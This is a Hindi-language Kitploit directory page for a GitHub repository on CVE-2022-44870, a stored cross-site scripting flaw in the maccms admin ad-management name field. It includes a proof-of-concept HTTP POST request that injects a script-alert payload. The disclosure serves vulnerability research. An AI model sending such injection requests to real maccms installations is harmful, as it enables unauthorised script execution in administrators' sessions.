Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-44870 — maccms admin+ xss हमले | Kitploit
उपकरण/GitHubGitHub/cedric1314/cve-2022-44870
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubcedric1314/cve-2022-44870

CVE-2022-44870

maccms admin+ xss हमले

रिपॉजिटरी देखें
213 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-44870

maccms admin+ xss हमले

अवलोकन

निर्माता की वेबसाइट जानकारी:https://maccms.pro

स्रोत कोड डाउनलोड पता : https://github.com/maccmspro/maccms10.git

  1. प्रभावित संस्करण: V2021.1000.2000

    图片
  2. कमजोरी विवरण

https://github.com/maccmspro/maccms10/issues/23

पृष्ठभूमि पर जाएं, बेसिक्स > एडी मैनेजमेंट > नाम पर जाएं,

नाम बॉक्स में payload1 डालें:

यह XSS हमले का कारण बन सकता है।

कमजोरी का नाम:स्टोरेज टाइप xss

कमजोरी का स्तर:मध्यम जोखिम

कमजोरी का स्थान: विज्ञापन प्रबंधन-->नाम

cat_title पर डालें

http://127.0.0.1/admin.php/admin/banner/infocat.html

图片

图片
  1. बार-बार होने वाली कमजोरियाँ और POC

POST /admin.php/admin/banner/infocat.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0

Accept: /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 65

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html

Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q

cat_id=&cat_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat_code=111

图片

टूल डाउनलोड करें